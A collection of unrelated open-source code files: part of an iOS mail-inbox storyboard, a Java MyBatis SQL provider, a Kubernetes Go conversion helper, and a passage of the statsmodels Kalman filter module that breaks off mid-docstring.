<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="252" verticalHuggingPriority="251" text="John Doe" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="C77-Oi-r7Y">
<rect key="frame" x="0.0" y="0.0" width="75.666666666666671" height="20.333333333333332"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleHeadline"/>
<nil key="textColor"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="12:16 AM" textAlignment="right" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="MgJ-f3-Qel">
<rect key="frame" x="81.666666666666657" y="1.3333333333333339" width="274.33333333333337" height="18"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<color key="textColor" red="0.40000000000000002" green="0.40000000000000002" blue="0.40000000000000002" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Disclosure" translatesAutoresizingMaskIntoConstraints="NO" id="UNG-rq-ulh">
<rect key="frame" x="362" y="3.333333333333333" width="14" height="14"/>
<constraints>
<constraint firstAttribute="width" constant="14" id="Ty6-tZ-2ee"/>
<constraint firstAttribute="height" constant="14" id="eoh-QM-XJN"/>
</constraints>
</imageView>
</subviews>
</stackView>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Fwd: Jane's independent studies" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="kOp-Z7-e55">
<rect key="frame" x="0.0" y="22.333333333333336" width="224.33333333333334" height="18.000000000000007"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<nil key="textColor"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" textAlignment="natural" lineBreakMode="tailTruncation" numberOfLines="2" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="wyD-6Z-4MU">
<rect key="frame" x="0.0" y="42.333333333333329" width="374.66666666666669" height="37.999999999999986"/>
<string key="text">Sra. Mendez - Thank you so MUCH for this. We know you do not have to do this and we are so grateful to you. Please let us know if there's anything else we can do.</string>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<color key="textColor" red="0.40000000000000002" green="0.40000000000000002" blue="0.40000000000000002" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
</subviews>
<constraints>
<constraint firstItem="mEo-oH-eCL" firstAttribute="width" secondItem="QLZ-ve-Blz" secondAttribute="width" id="X8m-GN-Ton"/>
</constraints>
</stackView>
</subviews>
<constraints>
<constraint firstItem="QLZ-ve-Blz" firstAttribute="leading" secondItem="4sX-Fn-82y" secondAttribute="leadingMargin" id="1jo-sd-j9z"/>
<constraint firstAttribute="trailingMargin" secondItem="QLZ-ve-Blz" secondAttribute="trailing" constant="8" id="FdO-rr-69c"/>
<constraint firstItem="QLZ-ve-Blz" firstAttribute="top" secondItem="4sX-Fn-82y" secondAttribute="top" constant="8" id="nFw-f6-NF3"/>
<constraint firstAttribute="bottom" relation="greaterThanOrEqual" secondItem="QLZ-ve-Blz" secondAttribute="bottom" constant="8" id="pEp-OB-V1T"/>
</constraints>
</tableViewCellContentView>
<connections>
<outlet property="bodyLabel" destination="wyD-6Z-4MU" id="MSP-7T-ocN"/>
<outlet property="dateLabel" destination="MgJ-f3-Qel" id="bBq-79-w1m"/>
<outlet property="fromLabel" destination="C77-Oi-r7Y" id="EqO-Vs-BwD"/>
<outlet property="subjectLabel" destination="kOp-Z7-e55" id="eAa-z9-y7H"/>
<segue destination="81m-9H-rJk" kind="show" id="jem-dB-OGt">
<segue key="commit" inheritsFrom="parent" id="y2C-s6-bBo"/>
<segue key="preview" inheritsFrom="commit" id="u0F-oO-kTk"/>
</segue>
</connections>
</tableViewCell>
</prototypes>
<connections>
<outlet property="dataSource" destination="6la-Rf-5vT" id="Efw-do-3sC"/>
<outlet property="delegate" destination="6la-Rf-5vT" id="M5W-j9-Dvc"/>
</connections>
</tableView>
<toolbarItems>
<barButtonItem image="MoreOutline" id="uNb-Nn-9h4">
<connections>
<action selector="moreTapped:" destination="6la-Rf-5vT" id="b3a-rO-t14"/>
</connections>
</barButtonItem>
<barButtonItem style="plain" systemItem="flexibleSpace" id="W67-Cg-GPa"/>
<barButtonItem systemItem="compose" id="JKa-4y-qF4"/>
</toolbarItems>
<navigationItem key="navigationItem" title="Inbox" id="OxT-d4-BSj">
<barButtonItem key="rightBarButtonItem" systemItem="edit" id="dHC-AY-Bdd"/>
</navigationItem>
</tableViewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="8lh-aK-vJ4" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="1137" y="536"/>
</scene>
<!--View Controller-->
<scene sceneID="17V-AF-8zo">
<objects>
<viewController id="81m-9H-rJk" sceneMemberID="viewController">
<layoutGuides>
<viewControllerLayoutGuide type="top" id="Zvn-TP-vhq"/>
<viewControllerLayoutGuide type="bottom" id="7lK-sQ-N5i"/>
</layoutGuides>
<view key="view" contentMode="scaleToFill" id="Wnv-we-QW8">
<rect key="frame" x="0.0" y="0.0" width="414" height="736"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<color key="backgroundColor" white="1" alpha="1" colorSpace="calibratedWhite"/>
</view>
<toolbarItems>
<barButtonItem systemItem="organize" id="anf-f8-yx4"/>
<barButtonItem style="plain" systemItem="flexibleSpace" id="utV-fK-yxL"/>
<barButtonItem systemItem="trash" id="mJb-1I-7hu"/>
<barButtonItem style="plain" systemItem="flexibleSpace" id="H5d-uO-1Uq"/>
<barButtonItem systemItem="reply" id="fbW-zE-I1v"/>
<barButtonItem style="plain" systemItem="flexibleSpace" id="7fs-2F-D0z"/>
<barButtonItem systemItem="compose" id="WlO-zb-3kD"/>
</toolbarItems>
<navigationItem key="navigationItem" id="EIm-x7-h3d"/>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="pAA-dO-BBI" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="1914" y="166"/>
</scene>
<!--Navigation Controller-->
<scene sceneID="t3H-qW-IeR">
<objects>
<navigationController automaticallyAdjustsScrollViewInsets="NO" toolbarHidden="NO" id="LX8-Wu-PZs" sceneMemberID="viewController">
<toolbarItems/>
<navigationBar key="navigationBar" contentMode="scaleToFill" id="J9z-jV-3U7">
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
<autoresizingMask key="autoresizingMask"/>
</navigationBar>
<nil name="viewControllers"/>
<toolbar key="toolbar" opaque="NO" clearsContextBeforeDrawing="NO" contentMode="scaleToFill" id="bOW-0N-oQR">
<rect key="frame" x="0.0" y="692" width="414" height="44"/>
<autoresizingMask key="autoresizingMask"/>
</toolbar>
<connections>
<segue destination="cmw-A4-aNK" kind="relationship" relationship="rootViewController" id="a6O-e5-iEC"/>
</connections>
</navigationController>
<placeholder placeholderIdentifier="IBFirstResponder" id="teA-Er-8PS" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="204" y="164.16791604197903"/>
</scene>
</scenes>
<resources>
<image name="Disclosure" width="14" height="14"/>
<image name="MoreOutline" width="23" height="23"/>
</resources>
<inferredMetricsTieBreakers>
<segue reference="jem-dB-OGt"/>
</inferredMetricsTieBreakers>
</document>
| {
"pile_set_name": "Github"
} |
package com.simon.provider;
import org.apache.ibatis.jdbc.SQL;
import java.util.Map;
/**
* 侧边栏菜单权限
*
* @author simon
* @date 2019-01-14
**/
public class SideMenuAuthorityProvider {
/**
* 构造SQL查询语句
* @param param 查询条件
* @return SQL字符串
*/
public String getList(Map<String, Object> param) {
return new SQL() {
{
SELECT("*");
FROM("t_side_menu_authority");
if (null != param.get("sideMenuId")) {
WHERE("side_menu_id=#{sideMenuId}");
}
}
}.toString();
}
}
| {
"pile_set_name": "Github"
} |
/*
Copyright 2015 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package conversion
import (
"k8s.io/apimachinery/third_party/forked/golang/reflect"
)
// The code for this type must be located in third_party, since it forks from
// go std lib. But for convenience, we expose the type here, too.
type Equalities struct {
reflect.Equalities
}
// For convenience, panics on errors
func EqualitiesOrDie(funcs ...interface{}) Equalities {
e := Equalities{reflect.Equalities{}}
if err := e.AddFuncs(funcs...); err != nil {
panic(err)
}
return e
}
| {
"pile_set_name": "Github"
} |
"""
State Space Representation and Kalman Filter
Author: Chad Fulton
License: Simplified-BSD
"""
import contextlib
from warnings import warn
import numpy as np
from .representation import OptionWrapper, Representation, FrozenRepresentation
from .tools import reorder_missing_matrix, reorder_missing_vector
from . import tools
from statsmodels.tools.sm_exceptions import ValueWarning
# Define constants
FILTER_CONVENTIONAL = 0x01 # Durbin and Koopman (2012), Chapter 4
FILTER_EXACT_INITIAL = 0x02 # ibid., Chapter 5.6
FILTER_AUGMENTED = 0x04 # ibid., Chapter 5.7
FILTER_SQUARE_ROOT = 0x08 # ibid., Chapter 6.3
FILTER_UNIVARIATE = 0x10 # ibid., Chapter 6.4
FILTER_COLLAPSED = 0x20 # ibid., Chapter 6.5
FILTER_EXTENDED = 0x40 # ibid., Chapter 10.2
FILTER_UNSCENTED = 0x80 # ibid., Chapter 10.3
FILTER_CONCENTRATED = 0x100 # Harvey (1989), Chapter 3.4
FILTER_CHANDRASEKHAR = 0x200 # Herbst (2015)
INVERT_UNIVARIATE = 0x01
SOLVE_LU = 0x02
INVERT_LU = 0x04
SOLVE_CHOLESKY = 0x08
INVERT_CHOLESKY = 0x10
STABILITY_FORCE_SYMMETRY = 0x01
MEMORY_STORE_ALL = 0
MEMORY_NO_FORECAST_MEAN = 0x01
MEMORY_NO_FORECAST_COV = 0x02
MEMORY_NO_FORECAST = MEMORY_NO_FORECAST_MEAN | MEMORY_NO_FORECAST_COV
MEMORY_NO_PREDICTED_MEAN = 0x04
MEMORY_NO_PREDICTED_COV = 0x08
MEMORY_NO_PREDICTED = MEMORY_NO_PREDICTED_MEAN | MEMORY_NO_PREDICTED_COV
MEMORY_NO_FILTERED_MEAN = 0x10
MEMORY_NO_FILTERED_COV = 0x20
MEMORY_NO_FILTERED = MEMORY_NO_FILTERED_MEAN | MEMORY_NO_FILTERED_COV
MEMORY_NO_LIKELIHOOD = 0x40
MEMORY_NO_GAIN = 0x80
MEMORY_NO_SMOOTHING = 0x100
MEMORY_NO_STD_FORECAST = 0x200
MEMORY_CONSERVE = (
MEMORY_NO_FORECAST_COV | MEMORY_NO_PREDICTED | MEMORY_NO_FILTERED |
MEMORY_NO_LIKELIHOOD | MEMORY_NO_GAIN | MEMORY_NO_SMOOTHING
)
TIMING_INIT_PREDICTED = 0
TIMING_INIT_FILTERED = 1
class KalmanFilter(Representation):
r"""
State space representation of a time series process, with Kalman filter
Parameters
----------
k_endog : {array_like, int}
The observed time-series process :math:`y` if array like or the
number of variables in the process if an integer.
k_states : int
The dimension of the unobserved state process.
k_posdef : int, optional
The dimension of a guaranteed positive definite covariance matrix
describing the shocks in the transition equation. Must be less than
or equal to `k_states`. Default is `k_states`.
loglikelihood_burn : int, optional
The number of initial periods during which the loglikelihood is not
recorded. Default is 0.
tolerance : float, optional
The tolerance at which the Kalman filter determines convergence to
steady-state. Default is 1e-19.
results_class : class, optional
Default results class to use to save filtering output. Default is
`FilterResults`. If specified, class must extend from `FilterResults`.
**kwargs
Keyword arguments may be used to provide values for the filter,
inversion, and stability methods. See `set_filter_method`,
`set_inversion_method`, and `set_stability_method`.
Keyword arguments may be used to provide default values for state space
matrices. See `Representation` for more details.
See Also
--------
FilterResults
statsmodels.tsa.statespace.representation.Representation
Notes
-----
There are several types of options available for controlling the Kalman
filter operation. All options are internally held as bitmasks, but can be
manipulated by setting class attributes, which act like boolean flags. For
more information, see the `set_*` class method documentation. The options
are:
filter_method
The filtering method controls aspects of which
Kalman filtering approach will be used.
inversion_method
The Kalman filter may contain one matrix inversion: that of the
forecast error covariance matrix. The inversion method controls how and
if that inverse is performed.
stability_method
The Kalman filter is a recursive algorithm that may in some cases
suffer issues with numerical stability. The stability method controls
what, if any, measures are taken to promote stability.
conserve_memory
By default, the Kalman filter computes a number of intermediate
matrices at each iteration. The memory conservation options control
which of those matrices are stored.
filter_timing
By default, the Kalman filter follows Durbin and Koopman, 2012, in
initializing the filter with predicted values. Kim and Nelson, 1999,
instead initialize the filter with filtered values, which is
essentially just a different timing convention.
The `filter_method` and `inversion_method` options intentionally allow
the possibility that multiple methods will be indicated. In the case that
multiple methods are selected, the underlying Kalman filter will attempt to
select the optional method given the input data.
For example, it may be that INVERT_UNIVARIATE and SOLVE_CHOLESKY are
indicated (this is in fact the default case). In this case, if the
endogenous vector is 1-dimensional (`k_endog` = 1), then INVERT_UNIVARIATE
is used and inversion reduces to simple division, and if it has a larger
dimension, the Cholesky decomposition along with linear solving (rather
than explicit matrix inversion) is used. If only SOLVE_CHOLESKY had been
set, then the Cholesky decomposition method would *always* be used, even in
the case of 1-dimensional data.
"""
filter_methods = [
'filter_conventional', 'filter_exact_initial', 'filter_augmented',
'filter_square_root', 'filter_univariate', 'filter_collapsed',
'filter_extended', 'filter_unscented', 'filter_concentrated',
'filter_chandrasekhar'
]
filter_conventional = OptionWrapper('filter_method', FILTER_CONVENTIONAL)
"""
(bool) Flag for conventional Kalman filtering.
"""
filter_exact_initial = OptionWrapper('filter_method', FILTER_EXACT_INITIAL)
"""
(bool) Flag for exact initial Kalman filtering. Not implemented.
"""
filter_augmented = OptionWrapper('filter_method', FILTER_AUGMENTED)
"""
(bool) Flag for augmented Kalman filtering. Not implemented.
"""
filter_square_root = OptionWrapper('filter_method', FILTER_SQUARE_ROOT)
"""
(bool) Flag for square-root Kalman filtering. Not implemented.
"""
filter_univariate = OptionWrapper('filter_method', FILTER_UNIVARIATE)
"""
(bool) Flag for univariate filtering of multivariate observation vector.
"""
filter_collapsed = OptionWrapper('filter_method', FILTER_COLLAPSED)
"""
(bool) Flag for Kalman filtering with collapsed observation vector.
"""
filter_extended = OptionWrapper('filter_method', FILTER_EXTENDED)
"""
(bool) Flag for extended Kalman filtering. Not implemented.
"""
filter_unscented = OptionWrapper('filter_method', FILTER_UNSCENTED)
"""
(bool) Flag for unscented Kalman filtering. Not implemented.
"""
filter_concentrated = OptionWrapper('filter_method', FILTER_CONCENTRATED)
"""
(bool) Flag for Kalman filtering with concentrated log-likelihood.
"""
filter_chandrasekhar = OptionWrapper('filter_method', FILTER_CHANDRASEKHAR)
"""
(bool) Flag for filtering with Chandrasekhar recursions.
"""
inversion_methods = [
'invert_univariate', 'solve_lu', 'invert_lu', 'solve_cholesky',
'invert_cholesky'
]
invert_univariate = OptionWrapper('inversion_method', INVERT_UNIVARIATE)
"""
(bool) Flag for univariate inversion method (recommended).
"""
solve_lu = OptionWrapper('inversion_method', SOLVE_LU)
"""
(bool) Flag for LU and linear solver inversion method.
"""
invert_lu = OptionWrapper('inversion_method', INVERT_LU)
"""
(bool) Flag for LU inversion method.
"""
solve_cholesky = OptionWrapper('inversion_method', SOLVE_CHOLESKY)
"""
(bool) Flag for Cholesky and linear solver inversion method (recommended).
"""
invert_cholesky = OptionWrapper('inversion_method', INVERT_CHOLESKY)
"""
(bool) Flag for Cholesky inversion method.
"""
stability_methods = ['stability_force_symmetry']
stability_force_symmetry = (
OptionWrapper('stability_method', STABILITY_FORCE_SYMMETRY)
)
"""
(bool) Flag for enforcing covariance matrix symmetry
"""
memory_options = [
'memory_store_all', 'memory_no_forecast_mean',
'memory_no_forecast_cov', 'memory_no_forecast',
'memory_no_predicted_mean', 'memory_no_predicted_cov',
'memory_no_predicted', 'memory_no_filtered_mean',
'memory_no_filtered_cov', 'memory_no_filtered',
'memory_no_likelihood', 'memory_no_gain',
'memory_no_smoothing', 'memory_no_std_forecast', 'memory_conserve'
]
memory_store_all = OptionWrapper('conserve_memory', MEMORY_STORE_ALL)
"""
(bool) Flag for storing all intermediate results in memory (default).
"""
memory_no_forecast_mean = OptionWrapper(
'conserve_memory', MEMORY_NO_FORECAST_MEAN)
"""
(bool) Flag to prevent storing forecasts and forecast errors.
"""
memory_no_forecast_cov = OptionWrapper(
'conserve_memory', MEMORY_NO_FORECAST_COV)
"""
(bool) Flag to prevent storing forecast error covariance matrices.
"""
@property
def memory_no_forecast(self):
"""
(bool) Flag to prevent storing all forecast-related output.
"""
return self.memory_no_forecast_mean or self.memory_no_forecast_cov
@memory_no_forecast.setter
def memory_no_forecast(self, value):
if bool(value):
self.memory_no_forecast_mean = True
self.memory_no_forecast_cov = True
else:
self.memory_no_forecast_mean = False
self.memory_no_forecast_cov = False
memory_no_predicted_mean = OptionWrapper(
'conserve_memory', MEMORY_NO_PREDICTED_MEAN)
"""
(bool) Flag to prevent storing predicted states.
"""
memory_no_predicted_cov = OptionWrapper(
'conserve_memory', MEMORY_NO_PREDICTED_COV)
"""
(bool) Flag to prevent storing predicted state covariance matrices.
"""
@property
def memory_no_predicted(self):
"""
(bool) Flag to prevent storing predicted state and covariance matrices.
"""
return self.memory_no_predicted_mean or self.memory_no_predicted_cov
@memory_no_predicted.setter
def memory_no_predicted(self, value):
if bool(value):
self.memory_no_predicted_mean = True
self.memory_no_predicted_cov = True
else:
self.memory_no_predicted_mean = False
self.memory_no_predicted_cov = False
memory_no_filtered_mean = OptionWrapper(
'conserve_memory', MEMORY_NO_FILTERED_MEAN)
"""
(bool) Flag to prevent storing filtered states.
"""
memory_no_filtered_cov = OptionWrapper(
'conserve_memory', MEMORY_NO_FILTERED_COV)
"""
(bool) Flag to prevent storing filtered state covariance matrices.
"""
@property
def memory_no_filtered(self):
"""
(bool) Flag to prevent storing filtered state and covariance matrices.
"""
return self.memory_no_filtered_mean or self.memory_no_filtered_cov
@memory_no_filtered.setter
def memory_no_filtered(self, value):
if bool(value):
self.memory_no_filtered_mean = True
self.memory_no_filtered_cov = True
else:
self.memory_no_filtered_mean = False
self.memory_no_filtered_cov = False
memory_no_likelihood = (
OptionWrapper('conserve_memory', MEMORY_NO_LIKELIHOOD)
)
"""
(bool) Flag to prevent storing likelihood values for each observation.
"""
memory_no_gain = OptionWrapper('conserve_memory', MEMORY_NO_GAIN)
"""
(bool) Flag to prevent storing the Kalman gain matrices.
"""
memory_no_smoothing = OptionWrapper('conserve_memory', MEMORY_NO_SMOOTHING)
"""
(bool) Flag to prevent storing likelihood values for each observation.
"""
memory_no_std_forecast = (
OptionWrapper('conserve_memory', MEMORY_NO_STD_FORECAST))
"""
(bool) Flag to prevent storing standardized forecast errors.
"""
memory_conserve = OptionWrapper('conserve_memory', MEMORY_CONSERVE)
"""
(bool) Flag to conserve the maximum amount of memory.
"""
timing_options = [
'timing_init_predicted', 'timing_init_filtered'
]
timing_init_predicted = OptionWrapper('filter_timing',
TIMING_INIT_PREDICTED)
"""
(bool) Flag for the default timing convention (Durbin and Koopman, 2012).
"""
timing_init_filtered = OptionWrapper('filter_timing', TIMING_INIT_FILTERED)
"""
(bool) Flag for the alternate timing convention (Kim and Nelson, 2012).
"""
# Default filter options
filter_method = FILTER_CONVENTIONAL
"""
(int) Filtering method bitmask.
"""
inversion_method = INVERT_UNIVARIATE | SOLVE_CHOLESKY
"""
(int) Inversion method bitmask.
"""
stability_method = STABILITY_FORCE_SYMMETRY
"""
(int) Stability method bitmask.
"""
conserve_memory = MEMORY_STORE_ALL
"""
(int) Memory conservation bitmask.
"""
filter_timing = TIMING_INIT_PREDICTED
"""
(int) Filter timing.
"""
def __init__(self, k_endog, k_states, k_posdef=None,
loglikelihood_burn=0, tolerance=1e-19, results_class=None,
kalman_filter_classes=None, **kwargs):
super(KalmanFilter, self).__init__(
k_endog, k_states, k_posdef, **kwargs
)
# Setup the underlying Kalman filter storage
self._kalman_filters = {}
# Filter options
self.loglikelihood_burn = loglikelihood_burn
self.results_class = (
results_class if results_class is not None else FilterResults
)
# Options
self.prefix_kalman_filter_map = (
kalman_filter_classes
if kalman_filter_classes is not None
else tools.prefix_kalman_filter_map.copy())
self.set_filter_method(**kwargs)
self.set_inversion_method(**kwargs)
self.set_stability_method(**kwargs)
self.set_conserve_memory(**kwargs)
self.set_filter_timing(**kwargs)
self.tolerance = tolerance
# Internal flags
# The _scale internal flag is used because we may want to
# use a fixed scale, in which case we want the flag to the Cython
# Kalman filter to indicate that the scale should not be concentrated
# out, so that self.filter_concentrated = False, but we still want to
# alert the results object that we are viewing the model as one in
# which the scale had been concentrated out for e.g. degree of freedom
# computations.
# This value should always be None, except within the fixed_scale
# context, and should not be modified by users or anywhere else.
self._scale = None
def _clone_kwargs(self, endog, **kwargs):
# See Representation._clone_kwargs for docstring
kwargs = super(KalmanFilter, self)._clone_kwargs(endog, **kwargs)
# Get defaults for options
kwargs.setdefault('filter_method', self.filter_method)
kwargs.setdefault('inversion_method', self.inversion_method)
kwargs.setdefault('stability_method', self.stability_method)
kwargs.setdefault('conserve_memory', self.conserve_memory)
kwargs.setdefault('filter_timing', self.filter_timing)
kwargs.setdefault('tolerance', self.tolerance)
kwargs.setdefault('loglikelihood_burn', self.loglikelihood_burn)
return kwargs
@property
def _kalman_filter(self):
prefix = self.prefix
if prefix in self._kalman_filters:
return self._kalman_filters[prefix]
return None
def _initialize_filter(self, filter_method=None, inversion_method=None,
stability_method=None, conserve_memory=None,
tolerance=None, filter_timing=None,
loglikelihood_burn=None):
if filter_method is None:
filter_method = self.filter_method
if inversion_method is None:
inversion_method = self.inversion_method
if stability_method is None:
stability_method = self.stability_method
if conserve_memory is None:
conserve_memory = self.conserve_memory
if loglikelihood_burn is None:
loglikelihood_burn = self.loglikelihood_burn
if filter_timing is None:
filter_timing = self.filter_timing
if tolerance is None:
tolerance = self.tolerance
# Make sure we have endog
if self.endog is None:
raise RuntimeError('Must bind a dataset to the model before'
' filtering or smoothing.')
# Initialize the representation matrices
prefix, dtype, create_statespace = self._initialize_representation()
# Determine if we need to (re-)create the filter
# (definitely need to recreate if we recreated the _statespace object)
create_filter = create_statespace or prefix not in self._kalman_filters
if not create_filter:
kalman_filter = self._kalman_filters[prefix]
create_filter = (
not kalman_filter.conserve_memory == conserve_memory or
not kalman_filter.loglikelihood_burn == loglikelihood_burn
)
# If the dtype-specific _kalman_filter does not exist (or if we need
# to re-create it), create it
if create_filter:
if prefix in self._kalman_filters:
# Delete the old filter
del self._kalman_filters[prefix]
# Setup the filter
cls = self.prefix_kalman_filter_map[prefix]
self._kalman_filters[prefix] = cls(
self._statespaces[prefix], filter_method, inversion_method,
stability_method, conserve_memory, filter_timing, tolerance,
loglikelihood_burn
)
# Otherwise, update the filter parameters
else:
kalman_filter = self._kalman_filters[prefix]
kalman_filter.set_filter_method(filter_method, False)
kalman_filter.inversion_method = inversion_method
kalman_filter.stability_method = stability_method
kalman_filter.filter_timing = filter_timing
kalman_filter.tolerance = tolerance
# conserve_memory and loglikelihood_burn changes always lead to
# re-created filters
return prefix, dtype, create_filter, create_statespace
def set_filter_method(self, filter_method=None, **kwargs):
r"""
Set the filtering method
The filtering method controls aspects of which Kalman filtering
approach will be used.
Parameters
----------
filter_method : int, optional
Bitmask value to set the filter method to. See notes for details.
**kwargs
Keyword arguments may be used to influence the filter method by
setting individual boolean flags. See notes for details.
Notes
-----
The filtering method is defined by a collection of boolean flags, and
is internally stored as a bitmask. The methods available are:
FILTER_CONVENTIONAL
Conventional Kalman filter.
FILTER_UNIVARIATE
Univariate approach to Kalman filtering. Overrides conventional
method if both are specified.
FILTER_COLLAPSED
Collapsed approach to Kalman filtering. Will be used *in addition*
to conventional or univariate filtering.
FILTER_CONCENTRATED
Use the concentrated log-likelihood function. Will be used
*in addition* to the other options.
Note that only the first method is available if using a Scipy version
older than 0.16.
If the bitmask is set directly via the `filter_method` argument, then
the full method must be provided.
If keyword arguments are used to set individual boolean flags, then
the lowercase of the method must be used as an argument name, and the
value is the desired value of the boolean flag (True or False).
Note that the filter method may also be specified by directly modifying
the class attributes which are defined similarly to the keyword
arguments.
The default filtering method is FILTER_CONVENTIONAL.
Examples
--------
>>> mod = sm.tsa.statespace.SARIMAX(range(10))
>>> mod.ssm.filter_method
1
>>> mod.ssm.filter_conventional
True
>>> mod.ssm.filter_univariate = True
>>> mod.ssm.filter_method
17
>>> mod.ssm.set_filter_method(filter_univariate=False,
... filter_collapsed=True)
>>> mod.ssm.filter_method
33
>>> mod.ssm.set_filter_method(filter_method=1)
>>> mod.ssm.filter_conventional
True
>>> mod.ssm.filter_univariate
False
>>> mod.ssm.filter_collapsed
False
>>> mod.ssm.filter_univariate = True
>>> mod.ssm.filter_method
17
"""
if filter_method is not None:
self.filter_method = filter_method
for name in KalmanFilter.filter_methods:
if name in kwargs:
setattr(self, name, kwargs[name])
def set_inversion_method(self, inversion_method=None, **kwargs):
r"""
Set the inversion method
The Kalman filter may contain one matrix inversion: that of the
forecast error covariance matrix. The inversion method controls how and
if that inverse is performed.
Parameters
----------
inversion_method : int, optional
Bitmask value to set the inversion method to. See notes for
details.
**kwargs
Keyword arguments may be used to influence the inversion method by
setting individual boolean flags. See notes for details.
Notes
-----
The inversion method is defined by a collection of boolean flags, and
is internally stored as a bitmask. The methods available are:
INVERT_UNIVARIATE
If the endogenous time series is univariate, then inversion can be
performed by simple division. If this flag is set and the time
series is univariate, then division will always be used even if
other flags are also set.
SOLVE_LU
Use an LU decomposition along with a linear solver (rather than
ever actually inverting the matrix).
INVERT_LU
Use an LU decomposition along with typical matrix inversion.
SOLVE_CHOLESKY
Use a Cholesky decomposition along with a linear solver.
INVERT_CHOLESKY
Use an Cholesky decomposition along with typical matrix inversion.
If the bitmask is set directly via the `inversion_method` argument,
then the full method must be provided.
If keyword arguments are used to set individual boolean flags, then
the lowercase of the method must be used as an argument name, and the
value is the desired value of the boolean flag (True or False).
Note that the inversion method may also be specified by directly
modifying the class attributes which are defined similarly to the
keyword arguments.
The default inversion method is `INVERT_UNIVARIATE | SOLVE_CHOLESKY`
Several things to keep in mind are:
- If the filtering method is specified to be univariate, then simple
division is always used regardless of the dimension of the endogenous
time series.
- Cholesky decomposition is about twice as fast as LU decomposition,
but it requires that the matrix be positive definite. While this
should generally be true, it may not be in every case.
- Using a linear solver rather than true matrix inversion is generally
faster and is numerically more stable.
Examples
--------
>>> mod = sm.tsa.statespace.SARIMAX(range(10))
>>> mod.ssm.inversion_method
1
>>> mod.ssm.solve_cholesky
True
>>> mod.ssm.invert_univariate
True
>>> mod.ssm.invert_lu
False
>>> mod.ssm.invert_univariate = False
>>> mod.ssm.inversion_method
8
>>> mod.ssm.set_inversion_method(solve_cholesky=False,
... invert_cholesky=True)
>>> mod.ssm.inversion_method
16
"""
if inversion_method is not None:
self.inversion_method = inversion_method
for name in KalmanFilter.inversion_methods:
if name in kwargs:
setattr(self, name, kwargs[name])
def set_stability_method(self, stability_method=None, **kwargs):
r"""
Set the numerical stability method
The Kalman filter is a recursive algorithm that may in some cases
suffer issues with numerical stability. The stability method controls
what, if any, measures are taken to promote stability.
Parameters
----------
stability_method : int, optional
Bitmask value to set the stability method to. See notes for
details.
**kwargs
Keyword arguments may be used to influence the stability method by
setting individual boolean flags. See notes for details.
Notes
-----
The stability method is defined by a collection of boolean flags, and
is internally stored as a bitmask. The methods available are:
STABILITY_FORCE_SYMMETRY = 0x01
If this flag is set, symmetry of the predicted state covariance
matrix is enforced at each iteration of the filter, where each
element is set to the average of the corresponding elements in the
upper and lower triangle.
If the bitmask is set directly via the `stability_method` argument,
then the full method must be provided.
If keyword arguments are used to set individual boolean flags, then
the lowercase of the method must be used as an argument name, and the
value is the desired value of the boolean flag (True or False).
Note that the stability method may also be specified by directly
modifying the class attributes which are defined similarly to the
keyword arguments.
The default stability method is `STABILITY_FORCE_SYMMETRY`
Examples
--------
>>> mod = sm.tsa.statespace.SARIMAX(range(10))
>>> mod.ssm.stability_method
1
>>> mod.ssm.stability_force_symmetry
True
>>> mod.ssm.stability_force_symmetry = False
>>> mod.ssm.stability_method
0
"""
if stability_method is not None:
self.stability_method = stability_method
for name in KalmanFilter.stability_methods:
if name in kwargs:
setattr(self, name, kwargs[name])
def set_conserve_memory(self, conserve_memory=None, **kwargs):
r"""
Set the memory conservation method
By default, the Kalman filter computes a number of intermediate
matrices at each iteration. The memory conservation options control
which of those matrices are stored.
Parameters
----------
conserve_memory : int, optional
Bitmask value to set the memory conservation method to. See notes
for details.
**kwargs
Keyword arguments may be used to influence the memory conservation
method by setting individual boolean flags. See notes for details.
Notes
-----
The memory conservation method is defined by a collection of boolean
flags, and is internally stored as a bitmask. The methods available
are:
MEMORY_STORE_ALL
Store all intermediate matrices. This is the default value.
MEMORY_NO_FORECAST_MEAN
Do not store the forecast or forecast errors. If this option is
used, the `predict` method from the results class is unavailable.
MEMORY_NO_FORECAST_COV
Do not store the forecast error covariance matrices.
MEMORY_NO_FORECAST
